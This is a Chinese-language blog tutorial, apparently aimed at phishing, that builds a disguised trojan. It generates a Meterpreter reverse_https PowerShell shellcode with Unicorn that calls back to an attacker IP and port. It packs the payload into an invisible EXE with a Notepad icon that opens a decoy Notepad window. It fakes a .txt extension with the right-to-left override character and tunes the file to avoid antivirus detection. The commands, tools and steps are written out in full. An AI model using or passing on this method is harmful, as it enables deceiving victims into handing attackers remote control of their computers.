左侧的文件是真实文本文件。右边的文件是PowerShell有效负载,两者看起来基本一模一样,可以看到都是.txt的文件名。打开我们的木马文件跟我们打开笔记本应用没有任何分别。但是我们的木马在后台悄悄执行了。CS MSF等等C2正常上线。1.生成shellcode1.我们使用CS MSF等等C2生成的powershell等shellcode.这里使用MSF演示
左侧的文件是真实文本文件。右边的文件是PowerShell有效负载,两者看起来基本一模一样,可以看到都是.txt的文件名。打开我们的木马文件跟我们打开笔记本应用没有任何分别。
但是我们的木马在后台悄悄执行了。CS MSF等等C2正常上线。
1.生成Shellcode
1.我们使用CS MSF等等C2生成的powershell等shellcode.
这里使用MSF演示。然后为了方便免杀,我们联动一个名为Unicorn的工具来生成shellcode吧。
Unicorn工具的主要作用是将复杂的shellcode有效负载直接注入内存。这样能达到一些免杀的作用。
在kali中使用git clone github.com/trustedsec/unicorn克隆Unicorn GitHub存储库。
进入Unicorn文件目录,然后
代码语言:javascript复制./unicorn.py windows/Meterpreter/reverse_https 192.168.50.146 4444
Unicorn将使用Metasploit reverse_https模块通过指定的端口连接到攻击者的ip地址。
会生成一个powershell的shellcode文件.txt和一个MSF的配置文件.c
把生成的unicorn.c文件导进MSF中打开
MSF会自动配置监听和其他配置。
我们看看原始的Uniocrn生成shellcode的免杀情况
还不错,其实这个shellcode直接使用也能上线的。但是我们的目的不是这个。
但是我们是钓鱼,钓鱼就一些迷惑的东西。将先前创建的PowerShell有效负载移至Windows系统,并另存为Payload.bat
我们去https://github.com/B00merang-Project/Windows-10-Icons’下载Windows 10图标。
在kali中就使用git下载吧
代码语言:javascript复制git clone'https://github.com/B00merang-Project/Windows-10-Icons
该文件中可能不包含内置Windows 10图标的确切副本,但是看起来足够接近,可以很好地利用。也可以在网上设计图标或找到更好的图标
2.将PNG转换为ICO格式
PNG将需要转换为Windows ICO图标格式。可以使用在线工具(如ConvertICO)完成此操作。只需将所需的PNG上传到网站,它将以ICO格式输出。
这里我们使用的是记事本的图标。
安装BAT2EXE
在Windows中,访问以下URL以下载B2E。
代码语言:javascript复制https://github.com/tokyoneon/B2E/raw/master/Bat_To_Exe_Converter.zip
解压缩下载文件,然后运行“ Bat_To_Exe_Converter_(Installer).exe”文件进行安装。
导入有效负载BAT
完成后,启动B2E,然后单击“打开”按钮以导入之前创建的payload.bat。
导入木马有效载荷
然后,将单词“ notepad”添加到payload.bat的顶部,然后单击“保存”。在执行PowerShell有效负载之前,这将使可执行文件在Windows计算机上打开记事本。这样做会使目标用户相信他们刚刚单击的文件确实是合法的文本文件。
转换和导出有效载荷
完成后,选中“ Icon”选项将其启用,然后使用“ …”按钮导入在上一步中创建ico图标。然后,将Exe格式更改为“ 64位Windows |(不可见)”,以防止在目标用户打开文件时弹出任何终端。
单击“转换”按钮以创建EXE,然后将文件名另存为txt.exe。
在将txt.exe保存到桌面并将其放置在真实文本文件旁边之后
ok 图标一样了,但是我们可以看到我们的木马文件是.exe的,正常的文件是.txt的。我们处理一下。
使用Unicode欺骗文件扩展名
使用称为“从右到左覆盖”(RLO)(https://unicode-table.com/en/202E/)的Unicode字符来反转字符在文件名中的显示顺序。
看视频吧。。打字好累。。。
点击播放视频
ok,成功返回shell,视频中可以看到我们的木马跟正常的txt文件是一样的,也可以输入文字。我们来看看木马的免杀。
7个,他妈的,问题不大,回去修修改改就可以,这里主要分享思路。
仅供安全学习,请不要非法攻击。